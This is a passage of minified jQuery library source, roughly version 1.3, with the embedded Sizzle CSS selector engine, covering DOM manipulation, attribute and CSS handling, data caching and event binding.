N=o.makeArray(K);o("option",this).each(function(){this.selected=(o.inArray(this.value,N)>=0||o.inArray(this.text,N)>=0)});if(!N.length){this.selectedIndex=-1}}else{this.value=K}}})},html:function(E){return E===g?(this[0]?this[0].innerHTML.replace(/ jQuery\d+="(?:\d+|null)"/g,""):null):this.empty().append(E)},replaceWith:function(E){return this.after(E).remove()},eq:function(E){return this.slice(E,+E+1)},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments),"slice",Array.prototype.slice.call(arguments).join(","))},map:function(E){return this.pushStack(o.map(this,function(G,F){return E.call(G,F,G)}))},andSelf:function(){return this.add(this.prevObject)},domManip:function(J,M,L){if(this[0]){var I=(this[0].ownerDocument||this[0]).createDocumentFragment(),F=o.clean(J,(this[0].ownerDocument||this[0]),I),H=I.firstChild;if(H){for(var G=0,E=this.length;G<E;G++){L.call(K(this[G],H),this.length>1||G>0?I.cloneNode(true):I)}}if(F){o.each(F,z)}}return this;function K(N,O){return M&&o.nodeName(N,"table")&&o.nodeName(O,"tr")?(N.getElementsByTagName("tbody")[0]||N.appendChild(N.ownerDocument.createElement("tbody"))):N}}};o.fn.init.prototype=o.fn;function z(E,F){if(F.src){o.ajax({url:F.src,async:false,dataType:"script"})}else{o.globalEval(F.text||F.textContent||F.innerHTML||"")}if(F.parentNode){F.parentNode.removeChild(F)}}function e(){return +new Date}o.extend=o.fn.extend=function(){var J=arguments[0]||{},H=1,I=arguments.length,E=false,G;if(typeof J==="boolean"){E=J;J=arguments[1]||{};H=2}if(typeof J!=="object"&&!o.isFunction(J)){J={}}if(I==H){J=this;--H}for(;H<I;H++){if((G=arguments[H])!=null){for(var F in G){var K=J[F],L=G[F];if(J===L){continue}if(E&&L&&typeof L==="object"&&!L.nodeType){J[F]=o.extend(E,K||(L.length!=null?[]:{}),L)}else{if(L!==g){J[F]=L}}}}}return J};var b=/z-?index|font-?weight|opacity|zoom|line-?height/i,q=document.defaultView||{},s=Object.prototype.toString;o.extend({noConflict:function(E){l.$=p;if(E){l.jQuery=y}return o},isFunction:function(E){return s.call(E)==="[object Function]"},isArray:function(E){return s.call(E)==="[object Array]"},isXMLDoc:function(E){return E.nodeType===9&&E.documentElement.nodeName!=="HTML"||!!E.ownerDocument&&o.isXMLDoc(E.ownerDocument)},globalEval:function(G){if(G&&/\S/.test(G)){var F=document.getElementsByTagName("head")[0]||document.documentElement,E=document.createElement("script");E.type="text/javascript";if(o.support.scriptEval){E.appendChild(document.createTextNode(G))}else{E.text=G}F.insertBefore(E,F.firstChild);F.removeChild(E)}},nodeName:function(F,E){return F.nodeName&&F.nodeName.toUpperCase()==E.toUpperCase()},each:function(G,K,F){var E,H=0,I=G.length;if(F){if(I===g){for(E in G){if(K.apply(G[E],F)===false){break}}}else{for(;H<I;){if(K.apply(G[H++],F)===false){break}}}}else{if(I===g){for(E in G){if(K.call(G[E],E,G[E])===false){break}}}else{for(var J=G[0];H<I&&K.call(J,H,J)!==false;J=G[++H]){}}}return G},prop:function(H,I,G,F,E){if(o.isFunction(I)){I=I.call(H,F)}return typeof I==="number"&&G=="curCSS"&&!b.test(E)?I+"px":I},className:{add:function(E,F){o.each((F||"").split(/\s+/),function(G,H){if(E.nodeType==1&&!o.className.has(E.className,H)){E.className+=(E.className?" ":"")+H}})},remove:function(E,F){if(E.nodeType==1){E.className=F!==g?o.grep(E.className.split(/\s+/),function(G){return !o.className.has(F,G)}).join(" "):""}},has:function(F,E){return F&&o.inArray(E,(F.className||F).toString().split(/\s+/))>-1}},swap:function(H,G,I){var E={};for(var F in G){E[F]=H.style[F];H.style[F]=G[F]}I.call(H);for(var F in G){H.style[F]=E[F]}},css:function(H,F,J,E){if(F=="width"||F=="height"){var L,G={position:"absolute",visibility:"hidden",display:"block"},K=F=="width"?["Left","Right"]:["Top","Bottom"];function I(){L=F=="width"?H.offsetWidth:H.offsetHeight;if(E==="border"){return}o.each(K,function(){if(!E){L-=parseFloat(o.curCSS(H,"padding"+this,true))||0}if(E==="margin"){L+=parseFloat(o.curCSS(H,"margin"+this,true))||0}else{L-=parseFloat(o.curCSS(H,"border"+this+"Width",true))||0}})}if(H.offsetWidth!==0){I()}else{o.swap(H,G,I)}return Math.max(0,Math.round(L))}return o.curCSS(H,F,J)},curCSS:function(I,F,G){var L,E=I.style;if(F=="opacity"&&!o.support.opacity){L=o.attr(E,"opacity");return L==""?"1":L}if(F.match(/float/i)){F=w}if(!G&&E&&E[F]){L=E[F]}else{if(q.getComputedStyle){if(F.match(/float/i)){F="float"}F=F.replace(/([A-Z])/g,"-$1").toLowerCase();var M=q.getComputedStyle(I,null);if(M){L=M.getPropertyValue(F)}if(F=="opacity"&&L==""){L="1"}}else{if(I.currentStyle){var J=F.replace(/\-(\w)/g,function(N,O){return O.toUpperCase()});L=I.currentStyle[F]||I.currentStyle[J];if(!/^\d+(px)?$/i.test(L)&&/^\d/.test(L)){var H=E.left,K=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;E.left=L||0;L=E.pixelLeft+"px";E.left=H;I.runtimeStyle.left=K}}}}return L},clean:function(F,K,I){K=K||document;if(typeof K.createElement==="undefined"){K=K.ownerDocument||K[0]&&K[0].ownerDocument||document}if(!I&&F.length===1&&typeof F[0]==="string"){var H=/^<(\w+)\s*\/?>$/.exec(F[0]);if(H){return[K.createElement(H[1])]}}var G=[],E=[],L=K.createElement("div");o.each(F,function(P,S){if(typeof S==="number"){S+=""}if(!S){return}if(typeof S==="string"){S=S.replace(/(<(\w+)[^>]*?)\/>/g,function(U,V,T){return T.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?U:V+"></"+T+">"});var O=S.replace(/^\s+/,"").substring(0,10).toLowerCase();var Q=!O.indexOf("<opt")&&[1,"<select multiple='multiple'>","</select>"]||!O.indexOf("<leg")&&[1,"<fieldset>","</fieldset>"]||O.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"<table>","</table>"]||!O.indexOf("<tr")&&[2,"<table><tbody>","</tbody></table>"]||(!O.indexOf("<td")||!O.indexOf("<th"))&&[3,"<table><tbody><tr>","</tr></tbody></table>"]||!O.indexOf("<col")&&[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"]||!o.support.htmlSerialize&&[1,"div<div>","</div>"]||[0,"",""];L.innerHTML=Q[1]+S+Q[2];while(Q[0]--){L=L.lastChild}if(!o.support.tbody){var R=/<tbody/i.test(S),N=!O.indexOf("<table")&&!R?L.firstChild&&L.firstChild.childNodes:Q[1]=="<table>"&&!R?L.childNodes:[];for(var M=N.length-1;M>=0;--M){if(o.nodeName(N[M],"tbody")&&!N[M].childNodes.length){N[M].parentNode.removeChild(N[M])}}}if(!o.support.leadingWhitespace&&/^\s/.test(S)){L.insertBefore(K.createTextNode(S.match(/^\s*/)[0]),L.firstChild)}S=o.makeArray(L.childNodes)}if(S.nodeType){G.push(S)}else{G=o.merge(G,S)}});if(I){for(var J=0;G[J];J++){if(o.nodeName(G[J],"script")&&(!G[J].type||G[J].type.toLowerCase()==="text/javascript")){E.push(G[J].parentNode?G[J].parentNode.removeChild(G[J]):G[J])}else{if(G[J].nodeType===1){G.splice.apply(G,[J+1,0].concat(o.makeArray(G[J].getElementsByTagName("script"))))}I.appendChild(G[J])}}return E}return G},attr:function(J,G,K){if(!J||J.nodeType==3||J.nodeType==8){return g}var H=!o.isXMLDoc(J),L=K!==g;G=H&&o.props[G]||G;if(J.tagName){var F=/href|src|style/.test(G);if(G=="selected"&&J.parentNode){J.parentNode.selectedIndex}if(G in J&&H&&!F){if(L){if(G=="type"&&o.nodeName(J,"input")&&J.parentNode){throw"type property can't be changed"}J[G]=K}if(o.nodeName(J,"form")&&J.getAttributeNode(G)){return J.getAttributeNode(G).nodeValue}if(G=="tabIndex"){var I=J.getAttributeNode("tabIndex");return I&&I.specified?I.value:J.nodeName.match(/(button|input|object|select|textarea)/i)?0:J.nodeName.match(/^(a|area)$/i)&&J.href?0:g}return J[G]}if(!o.support.style&&H&&G=="style"){return o.attr(J.style,"cssText",K)}if(L){J.setAttribute(G,""+K)}var E=!o.support.hrefNormalized&&H&&F?J.getAttribute(G,2):J.getAttribute(G);return E===null?g:E}if(!o.support.opacity&&G=="opacity"){if(L){J.zoom=1;J.filter=(J.filter||"").replace(/alpha\([^)]*\)/,"")+(parseInt(K)+""=="NaN"?"":"alpha(opacity="+K*100+")")}return J.filter&&J.filter.indexOf("opacity=")>=0?(parseFloat(J.filter.match(/opacity=([^)]*)/)[1])/100)+"":""}G=G.replace(/-([a-z])/ig,function(M,N){return N.toUpperCase()});if(L){J[G]=K}return J[G]},trim:function(E){return(E||"").replace(/^\s+|\s+$/g,"")},makeArray:function(G){var E=[];if(G!=null){var F=G.length;if(F==null||typeof G==="string"||o.isFunction(G)||G.setInterval){E[0]=G}else{while(F){E[--F]=G[F]}}}return E},inArray:function(G,H){for(var E=0,F=H.length;E<F;E++){if(H[E]===G){return E}}return -1},merge:function(H,E){var F=0,G,I=H.length;if(!o.support.getAll){while((G=E[F++])!=null){if(G.nodeType!=8){H[I++]=G}}}else{while((G=E[F++])!=null){H[I++]=G}}return H},unique:function(K){var F=[],E={};try{for(var G=0,H=K.length;G<H;G++){var J=o.data(K[G]);if(!E[J]){E[J]=true;F.push(K[G])}}}catch(I){F=K}return F},grep:function(F,J,E){var G=[];for(var H=0,I=F.length;H<I;H++){if(!E!=!J(F[H],H)){G.push(F[H])}}return G},map:function(E,J){var F=[];for(var G=0,H=E.length;G<H;G++){var I=J(E[G],G);if(I!=null){F[F.length]=I}}return F.concat.apply([],F)}});var C=navigator.userAgent.toLowerCase();o.browser={version:(C.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[0,"0"])[1],safari:/webkit/.test(C),opera:/opera/.test(C),msie:/msie/.test(C)&&!/opera/.test(C),mozilla:/mozilla/.test(C)&&!/(compatible|webkit)/.test(C)};o.each({parent:function(E){return E.parentNode},parents:function(E){return o.dir(E,"parentNode")},next:function(E){return o.nth(E,2,"nextSibling")},prev:function(E){return o.nth(E,2,"previousSibling")},nextAll:function(E){return o.dir(E,"nextSibling")},prevAll:function(E){return o.dir(E,"previousSibling")},siblings:function(E){return o.sibling(E.parentNode.firstChild,E)},children:function(E){return o.sibling(E.firstChild)},contents:function(E){return o.nodeName(E,"iframe")?E.contentDocument||E.contentWindow.document:o.makeArray(E.childNodes)}},function(E,F){o.fn[E]=function(G){var H=o.map(this,F);if(G&&typeof G=="string"){H=o.multiFilter(G,H)}return this.pushStack(o.unique(H),E,G)}});o.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(E,F){o.fn[E]=function(G){var J=[],L=o(G);for(var K=0,H=L.length;K<H;K++){var I=(K>0?this.clone(true):this).get();o.fn[F].apply(o(L[K]),I);J=J.concat(I)}return this.pushStack(J,E,G)}});o.each({removeAttr:function(E){o.attr(this,E,"");if(this.nodeType==1){this.removeAttribute(E)}},addClass:function(E){o.className.add(this,E)},removeClass:function(E){o.className.remove(this,E)},toggleClass:function(F,E){if(typeof E!=="boolean"){E=!o.className.has(this,F)}o.className[E?"add":"remove"](this,F)},remove:function(E){if(!E||o.filter(E,[this]).length){o("*",this).add([this]).each(function(){o.event.remove(this);o.removeData(this)});if(this.parentNode){this.parentNode.removeChild(this)}}},empty:function(){o(this).children().remove();while(this.firstChild){this.removeChild(this.firstChild)}}},function(E,F){o.fn[E]=function(){return this.each(F,arguments)}});function j(E,F){return E[0]&&parseInt(o.curCSS(E[0],F,true),10)||0}var h="jQuery"+e(),v=0,A={};o.extend({cache:{},data:function(F,E,G){F=F==l?A:F;var H=F[h];if(!H){H=F[h]=++v}if(E&&!o.cache[H]){o.cache[H]={}}if(G!==g){o.cache[H][E]=G}return E?o.cache[H][E]:H},removeData:function(F,E){F=F==l?A:F;var H=F[h];if(E){if(o.cache[H]){delete o.cache[H][E];E="";for(E in o.cache[H]){break}if(!E){o.removeData(F)}}}else{try{delete F[h]}catch(G){if(F.removeAttribute){F.removeAttribute(h)}}delete o.cache[H]}},queue:function(F,E,H){if(F){E=(E||"fx")+"queue";var G=o.data(F,E);if(!G||o.isArray(H)){G=o.data(F,E,o.makeArray(H))}else{if(H){G.push(H)}}}return G},dequeue:function(H,G){var E=o.queue(H,G),F=E.shift();if(!G||G==="fx"){F=E[0]}if(F!==g){F.call(H)}}});o.fn.extend({data:function(E,G){var H=E.split(".");H[1]=H[1]?"."+H[1]:"";if(G===g){var F=this.triggerHandler("getData"+H[1]+"!",[H[0]]);if(F===g&&this.length){F=o.data(this[0],E)}return F===g&&H[1]?this.data(H[0]):F}else{return this.trigger("setData"+H[1]+"!",[H[0],G]).each(function(){o.data(this,E,G)})}},removeData:function(E){return this.each(function(){o.removeData(this,E)})},queue:function(E,F){if(typeof E!=="string"){F=E;E="fx"}if(F===g){return o.queue(this[0],E)}return this.each(function(){var G=o.queue(this,E,F);if(E=="fx"&&G.length==1){G[0].call(this)}})},dequeue:function(E){return this.each(function(){o.dequeue(this,E)})}}); +/* + * Sizzle CSS Selector Engine - v0.9.3 + * Copyright 2009, The Dojo Foundation + * Released under the MIT, BSD, and GPL Licenses. + * More information: http://sizzlejs.com/ + */ +(function(){var R=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?/g,L=0,H=Object.prototype.toString;var F=function(Y,U,ab,ac){ab=ab||[];U=U||document;if(U.nodeType!==1&&U.nodeType!==9){return[]}if(!Y||typeof Y!=="string"){return ab}var Z=[],W,af,ai,T,ad,V,X=true;R.lastIndex=0;while((W=R.exec(Y))!==null){Z.push(W[1]);if(W[2]){V=RegExp.rightContext;break}}if(Z.length>1&&M.exec(Y)){if(Z.length===2&&I.relative[Z[0]]){af=J(Z[0]+Z[1],U)}else{af=I.relative[Z[0]]?[U]:F(Z.shift(),U);while(Z.length){Y=Z.shift();if(I.relative[Y]){Y+=Z.shift()}af=J(Y,af)}}}else{var ae=ac?{expr:Z.pop(),set:E(ac)}:F.find(Z.pop(),Z.length===1&&U.parentNode?U.parentNode:U,Q(U));af=F.filter(ae.expr,ae.set);if(Z.length>0){ai=E(af)}else{X=false}while(Z.length){var ah=Z.pop(),ag=ah;if(!I.relative[ah]){ah=""}else{ag=Z.pop()}if(ag==null){ag=U}I.relative[ah](ai,ag,Q(U))}}if(!ai){ai=af}if(!ai){throw"Syntax error, unrecognized expression: "+(ah||Y)}if(H.call(ai)==="[object Array]"){if(!X){ab.push.apply(ab,ai)}else{if(U.nodeType===1){for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&(ai[aa]===true||ai[aa].nodeType===1&&K(U,ai[aa]))){ab.push(af[aa])}}}else{for(var aa=0;ai[aa]!=null;aa++){if(ai[aa]&&ai[aa].nodeType===1){ab.push(af[aa])}}}}}else{E(ai,ab)}if(V){F(V,U,ab,ac);if(G){hasDuplicate=false;ab.sort(G);if(hasDuplicate){for(var aa=1;aa<ab.length;aa++){if(ab[aa]===ab[aa-1]){ab.splice(aa--,1)}}}}}return ab};F.matches=function(T,U){return F(T,null,null,U)};F.find=function(aa,T,ab){var Z,X;if(!aa){return[]}for(var W=0,V=I.order.length;W<V;W++){var Y=I.order[W],X;if((X=I.match[Y].exec(aa))){var U=RegExp.leftContext;if(U.substr(U.length-1)!=="\\"){X[1]=(X[1]||"").replace(/\\/g,"");Z=I.find[Y](X,T,ab);if(Z!=null){aa=aa.replace(I.match[Y],"");break}}}}if(!Z){Z=T.getElementsByTagName("*")}return{set:Z,expr:aa}};F.filter=function(ad,ac,ag,W){var V=ad,ai=[],aa=ac,Y,T,Z=ac&&ac[0]&&Q(ac[0]);while(ad&&ac.length){for(var ab in I.filter){if((Y=I.match[ab].exec(ad))!=null){var U=I.filter[ab],ah,af;T=false;if(aa==ai){ai=[]}if(I.preFilter[ab]){Y=I.preFilter[ab](Y,aa,ag,ai,W,Z);if(!Y){T=ah=true}else{if(Y===true){continue}}}if(Y){for(var X=0;(af=aa[X])!=null;X++){if(af){ah=U(af,Y,X,aa);var ae=W^!!ah;if(ag&&ah!=null){if(ae){T=true}else{aa[X]=false}}else{if(ae){ai.push(af);T=true}}}}}if(ah!==g){if(!ag){aa=ai}ad=ad.replace(I.match[ab],"");if(!T){return[]}break}}}if(ad==V){if(T==null){throw"Syntax error, unrecognized expression: "+ad}else{break}}V=ad}return aa};var I=F.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF_-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF_-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF_-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*_-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF_-]|\\.)+)(?:\((['"]*)((?:\([^\)]+\)|[^\2\(\)]*)+)\2\))?/},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(T){return T.getAttribute("href")}},relative:{"+":function(aa,T,Z){var X=typeof T==="string",ab=X&&!/\W/.test(T),Y=X&&!ab;if(ab&&!Z){T=T.toUpperCase()}for(var W=0,V=aa.length,U;W<V;W++){if((U=aa[W])){while((U=U.previousSibling)&&U.nodeType!==1){}aa[W]=Y||U&&U.nodeName===T?U||false:U===T}}if(Y){F.filter(T,aa,true)}},">":function(Z,U,aa){var X=typeof U==="string";if(X&&!/\W/.test(U)){U=aa?U:U.toUpperCase();for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){var W=Y.parentNode;Z[V]=W.nodeName===U?W:false}}}else{for(var V=0,T=Z.length;V<T;V++){var Y=Z[V];if(Y){Z[V]=X?Y.parentNode:Y.parentNode===U}}if(X){F.filter(U,Z,true)}}},"":function(W,U,Y){var V=L++,T=S;if(!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("parentNode",U,V,W,X,Y)},"~":function(W,U,Y){var V=L++,T=S;if(typeof U==="string"&&!U.match(/\W/)){var X=U=Y?U:U.toUpperCase();T=P}T("previousSibling",U,V,W,X,Y)}},find:{ID:function(U,V,W){if(typeof V.getElementById!=="undefined"&&!W){var T=V.getElementById(U[1]);return T?[T]:[]}},NAME:function(V,Y,Z){if(typeof Y.getElementsByName!=="undefined"){var U=[],X=Y.getElementsByName(V[1]);for(var W=0,T=X.length;W<T;W++){if(X[W].getAttribute("name")===V[1]){U.push(X[W])}}return U.length===0?null:U}},TAG:function(T,U){return U.getElementsByTagName(T[1])}},preFilter:{CLASS:function(W,U,V,T,Z,aa){W=" "+W[1].replace(/\\/g,"")+" ";if(aa){return W}for(var X=0,Y;(Y=U[X])!=null;X++){if(Y){if(Z^(Y.className&&(" "+Y.className+" ").indexOf(W)>=0)){if(!V){T.push(Y)}}else{if(V){U[X]=false}}}}return false},ID:function(T){return T[1].replace(/\\/g,"")},TAG:function(U,T){for(var V=0;T[V]===false;V++){}return T[V]&&Q(T[V])?U[1]:U[1].toUpperCase()},CHILD:function(T){if(T[1]=="nth"){var U=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(T[2]=="even"&&"2n"||T[2]=="odd"&&"2n+1"||!/\D/.test(T[2])&&"0n+"+T[2]||T[2]);T[2]=(U[1]+(U[2]||1))-0;T[3]=U[3]-0}T[0]=L++;return T},ATTR:function(X,U,V,T,Y,Z){var W=X[1].replace(/\\/g,"");if(!Z&&I.attrMap[W]){X[1]=I.attrMap[W]}if(X[2]==="~="){X[4]=" "+X[4]+" "}return X},PSEUDO:function(X,U,V,T,Y){if(X[1]==="not"){if(X[3].match(R).length>1||/^\w/.test(X[3])){X[3]=F(X[3],null,null,U)}else{var W=F.filter(X[3],U,V,true^Y);if(!V){T.push.apply(T,W)}return false}}else{if(I.match.POS.test(X[0])||I.match.CHILD.test(X[0])){return true}}return X},POS:function(T){T.unshift(true);return T}},filters:{enabled:function(T){return T.disabled===false&&T.type!=="hidden"},disabled:function(T){return T.disabled===true},checked:function(T){return T.checked===true},selected:function(T){T.parentNode.selectedIndex;return T.selected===true},parent:function(T){return !!T.firstChild},empty:function(T){return !T.firstChild},has:function(V,U,T){return !!F(T[3],V).length},header:function(T){return/h\d/i.test(T.nodeName)},text:function(T){return"text"===T.type},radio:function(T){return"radio"===T.type},checkbox:function(T){return"checkbox"===T.type},file:function(T){return"file"===T.type},password:function(T){return"password"===T.type},submit:function(T){return"submit"===T.type},image:function(T){return"image"===T.type},reset:function(T){return"reset"===T.type},button:function(T){return"button"===T.type||T.nodeName.toUpperCase()==="BUTTON"},input:function(T){return/input|select|textarea|button/i.test(T.nodeName)}},setFilters:{first:function(U,T){return T===0},last:function(V,U,T,W){return U===W.length-1},even:function(U,T){return T%2===0},odd:function(U,T){return T%2===1},lt:function(V,U,T){return U<T[3]-0},gt:function(V,U,T){return U>T[3]-0},nth:function(V,U,T){return T[3]-0==U},eq:function(V,U,T){return T[3]-0==U}},filter:{PSEUDO:function(Z,V,W,aa){var U=V[1],X=I.filters[U];if(X){return X(Z,W,V,aa)}else{if(U==="contains"){return(Z.textContent||Z.innerText||"").indexOf(V[3])>=0}else{if(U==="not"){var Y=V[3];for(var W=0,T=Y.length;W<T;W++){if(Y[W]===Z){return false}}return true}}}},CHILD:function(T,W){var Z=W[1],U=T;switch(Z){case"only":case"first":while(U=U.previousSibling){if(U.nodeType===1){return false}}if(Z=="first"){return true}U=T;case"last":while(U=U.nextSibling){if(U.nodeType===1){return false}}return true;case"nth":var V=W[2],ac=W[3];if(V==1&&ac==0){return true}var Y=W[0],ab=T.parentNode;if(ab&&(ab.sizcache!==Y||!T.nodeIndex)){var X=0;for(U=ab.firstChild;U;U=U.nextSibling){if(U.nodeType===1){U.nodeIndex=++X}}ab.sizcache=Y}var aa=T.nodeIndex-ac;if(V==0){return aa==0}else{return(aa%V==0&&aa/V>=0)}}},ID:function(U,T){return U.nodeType===1&&U.getAttribute("id")===T},TAG:function(U,T){return(T==="*"&&U.nodeType===1)||U.nodeName===T},CLASS:function(U,T){return(" "+(U.className||U.getAttribute("class"))+" ").indexOf(T)>-1},ATTR:function(Y,W){var V=W[1],T=I.attrHandle[V]?I.attrHandle[V](Y):Y[V]!=null?Y[V]:Y.getAttribute(V),Z=T+"",X=W[2],U=W[4];return T==null?X==="!=":X==="="?Z===U:X==="*="?Z.indexOf(U)>=0:X==="~="?(" "+Z+" ").indexOf(U)>=0:!U?Z&&T!==false:X==="!="?Z!=U:X==="^="?Z.indexOf(U)===0:X==="$="?Z.substr(Z.length-U.length)===U:X==="|="?Z===U||Z.substr(0,U.length+1)===U+"-":false},POS:function(X,U,V,Y){var T=U[2],W=I.setFilters[T];if(W){return W(X,V,U,Y)}}}};var M=I.match.POS;for(var O in I.match){I.match[O]=RegExp(I.match[O].source+/(?![^\[]*\])(?![^\(]*\))/.source)}var E=function(U,T){U=Array.prototype.slice.call(U);if(T){T.push.apply(T,U);return T}return U};try{Array.prototype.slice.call(document.documentElement.childNodes)}catch(N){E=function(X,W){var U=W||[];if(H.call(X)==="[object Array]"){Array.prototype.push.apply(U,X)}else{if(typeof X.length==="number"){for(var V=0,T=X.length;V<T;V++){U.push(X[V])}}else{for(var V=0;X[V];V++){U.push(X[V])}}}return U}}var G;if(document.documentElement.compareDocumentPosition){G=function(U,T){var V=U.compareDocumentPosition(T)&4?-1:U===T?0:1;if(V===0){hasDuplicate=true}return V}}else{if("sourceIndex" in document.documentElement){G=function(U,T){var V=U.sourceIndex-T.sourceIndex;if(V===0){hasDuplicate=true}return V}}else{if(document.createRange){G=function(W,U){var V=W.ownerDocument.createRange(),T=U.ownerDocument.createRange();V.selectNode(W);V.collapse(true);T.selectNode(U);T.collapse(true);var X=V.compareBoundaryPoints(Range.START_TO_END,T);if(X===0){hasDuplicate=true}return X}}}}(function(){var U=document.createElement("form"),V="script"+(new Date).getTime();U.innerHTML="<input name='"+V+"'/>";var T=document.documentElement;T.insertBefore(U,T.firstChild);if(!!document.getElementById(V)){I.find.ID=function(X,Y,Z){if(typeof Y.getElementById!=="undefined"&&!Z){var W=Y.getElementById(X[1]);return W?W.id===X[1]||typeof W.getAttributeNode!=="undefined"&&W.getAttributeNode("id").nodeValue===X[1]?[W]:g:[]}};I.filter.ID=function(Y,W){var X=typeof Y.getAttributeNode!=="undefined"&&Y.getAttributeNode("id");return Y.nodeType===1&&X&&X.nodeValue===W}}T.removeChild(U)})();(function(){var T=document.createElement("div");T.appendChild(document.createComment(""));if(T.getElementsByTagName("*").length>0){I.find.TAG=function(U,Y){var X=Y.getElementsByTagName(U[1]);if(U[1]==="*"){var W=[];for(var V=0;X[V];V++){if(X[V].nodeType===1){W.push(X[V])}}X=W}return X}}T.innerHTML="<a href='#'></a>";if(T.firstChild&&typeof T.firstChild.getAttribute!=="undefined"&&T.firstChild.getAttribute("href")!=="#"){I.attrHandle.href=function(U){return U.getAttribute("href",2)}}})();if(document.querySelectorAll){(function(){var T=F,U=document.createElement("div");U.innerHTML="<p class='TEST'></p>";if(U.querySelectorAll&&U.querySelectorAll(".TEST").length===0){return}F=function(Y,X,V,W){X=X||document;if(!W&&X.nodeType===9&&!Q(X)){try{return E(X.querySelectorAll(Y),V)}catch(Z){}}return T(Y,X,V,W)};F.find=T.find;F.filter=T.filter;F.selectors=T.selectors;F.matches=T.matches})()}if(document.getElementsByClassName&&document.documentElement.getElementsByClassName){(function(){var T=document.createElement("div");T.innerHTML="<div class='test e'></div><div class='test'></div>";if(T.getElementsByClassName("e").length===0){return}T.lastChild.className="e";if(T.getElementsByClassName("e").length===1){return}I.order.splice(1,0,"CLASS");I.find.CLASS=function(U,V,W){if(typeof V.getElementsByClassName!=="undefined"&&!W){return V.getElementsByClassName(U[1])}}})()}function P(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1&&!ac){T.sizcache=Y;T.sizset=W}if(T.nodeName===Z){X=T;break}T=T[U]}ad[W]=X}}}function S(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1){if(!ac){T.sizcache=Y;T.sizset=W}if(typeof Z!=="string"){if(T===Z){X=true;break}}else{if(F.filter(Z,[T]).length>0){X=T;break}}}T=T[U]}ad[W]=X}}}var K=document.compareDocumentPosition?function(U,T){return U.compareDocumentPosition(T)&16}:function(U,T){return U!==T&&(U.contains?U.contains(T):true)};var Q=function(T){return T.nodeType===9&&T.documentElement.nodeName!=="HTML"||!!T.ownerDocument&&Q(T.ownerDocument)};var J=function(T,aa){var W=[],X="",Y,V=aa.nodeType?[aa]:aa;while((Y=I.match.PSEUDO.exec(T))){X+=Y[0];T=T.replace(I.match.PSEUDO,"")}T=I.relative[T]?T+"*":T;for(var Z=0,U=V.length;Z<U;Z++){F(T,V[Z],W)}return F.filter(X,W)};o.find=F;o.filter=F.filter;o.expr=F.selectors;o.expr[":"]=o.expr.filters;F.selectors.filters.hidden=function(T){return T.offsetWidth===0||T.offsetHeight===0};F.selectors.filters.visible=function(T){return T.offsetWidth>0||T.offsetHeight>0};F.selectors.filters.animated=function(T){return o.grep(o.timers,function(U){return T===U.elem}).length};o.multiFilter=function(V,T,U){if(U){V=":not("+V+")"}return F.matches(V,T)};o.dir=function(V,U){var T=[],W=V[U];while(W&&W!=document){if(W.nodeType==1){T.push(W)}W=W[U]}return T};o.nth=function(X,T,V,W){T=T||1;var U=0;for(;X;X=X[V]){if(X.nodeType==1&&++U==T){break}}return X};o.sibling=function(V,U){var T=[];for(;V;V=V.nextSibling){if(V.nodeType==1&&V!=U){T.push(V)}}return T};return;l.Sizzle=F})();o.event={add:function(I,F,H,K){if(I.nodeType==3||I.nodeType==8){return}if(I.setInterval&&I!=l){I=l}if(!H.guid){H.guid=this.guid++}if(K!==g){var G=H;H=this.proxy(G);H.data=K}var E=o.data(I,"events")||o.data(I,"events",{}),J=o.data(I,"handle")||o.data(I,"handle",function(){return typeof o!=="undefined"&&!o.event.triggered?o.event.handle.apply(arguments.callee.elem,arguments):g});J.elem=I;o.each(F.split(/\s+/),function(M,N){var O=N.split(".");N=O.shift();H.type=O.slice().sort().join(".");var L=E[N];if(o.event.specialAll[N]){o.event.specialAll[N].setup.call(I,K,O)}if(!L){L=E[N]={};if(!o.event.special[N]||o.event.special[N].setup.call(I,K,O)===false){if(I.addEventListener){I.addEventListener(N,J,false)}else{if(I.attachEvent){I.attachEvent("on"+N,J)}}}}L[H.guid]=H;o.event.global[N]=true});I=null},guid:1,global:{},remove:function(K,H,J){if(K.nodeType==3||K.nodeType==8){return}var G=o.data(K,"events"),F,E;if(G){if(H===g||(typeof H==="string"&&H.charAt(0)==".")){for(var I in G){this.remove(K,I+(H||""))}}else{if(H.type){J=H.handler;H=H.type}o.each(H.split(/\s+/),function(M,O){var Q=O.split(".");O=Q.shift();var 